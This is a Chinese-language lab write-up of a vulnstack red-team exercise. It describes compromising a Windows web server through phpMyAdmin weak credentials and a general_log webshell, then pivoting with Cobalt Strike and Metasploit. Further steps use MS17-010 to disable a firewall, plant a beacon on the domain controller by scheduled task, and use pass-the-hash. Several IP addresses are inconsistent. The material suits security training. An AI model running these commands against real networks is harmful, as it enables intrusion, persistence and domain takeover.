vulnstack红队实战一
拓扑结构
web服务器(win7):192.168.77.129 192.168.52.143
域控(win2008):192.168.52.138
域成员(win2003)192.168.52.144
攻击机:192.168.77.128
外网渗透
信息打点
发现80,3306端口访问80端口
一个php探针,那么就会存在php的web服务,我们可以做个目录扫描,寻找一下入口
扫描到phpmyadmin,phpinfo等
phpinfo中得到web目录的绝对路径
Getshell
弱口令(root:root)登录进入phpmyadmin
值为null,那就无法直接写shell
通过日志的方法将shell写到web服务目录
set global general_log = on; set global general_log_file = "C:/phpStudy/WWW/shell.php";
先执行一个select "";
就会被存入C:/phpStudy/WWW/shell.php
连接此shell
CS创建后门程序上传
提权:
右键上线的主机--->Access--->Elevate--->选择teamserver对应的Listener--->点击Launch
内网渗透
执行shell ipconfig发现双网卡
内网域为192.168.52.0/24 已控制主机为192.168.52.143
shell systeminfo发现域名god.org
net view探测ip
shell net time /domain
一般而言域内时间服务器就是域控
验证
- 域
god.org
- 域内机器
- 上线机器(win7)
192.168.52.143
- 域控/域登录服务器
192.168.52.138owa.god.org
- 另一个域内机器
192.168.52.141
- 上线机器(win7)
横向移动
需要借助msf进行渗透,所以将cs与msf建立连接
新建一个listener将流量转发至攻击机
攻击机监听被控主机
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.72.129
set lport 8000
exploit
配置路由
run get_local_subnets #查看网段/子网
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p #查看路由
background #转入后台运行
子网为192.168.52.0/24的流量都会通过刚刚建立的Session 2(win7)来路由
扫描主机144
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135,139,3306,3389,445 #也可以0-65535
run
这里不知道为什么没有扫描到,可能是环境的问题
此处445端口开放可能存在ms17-010漏洞
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command "netsh advfirewall set allprofiles state off"
exploit
这里关闭防火墙
上面一样的流程更换执行命令为ipconfig /all
set command "ipconfig /all"
执行成功拿下内网主机141权限
抓取域内账号密码
域内主机通过ipc连接
shell net use \192.168.52.138\ipc$ "得到的密码" /user:god\administrator
先上传一个木马到域内主机,然后域内主机复制到域控
shell copy b.exe \192.168.52.138\c$
创建计划任务运行木马
shell schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
shell schtasks /run /s 192.168.52.138 /i /tn "test"
link 192.168.56.138
获取shell
哈希传递法
cs左上角点击Cobalt Strike => 可视化 => 目标列表 => 选择要上线设备(192.168.52.135) => 点击Jump => 选择psexec64
注意使用pipe监听
浙公网安备 33010602011771号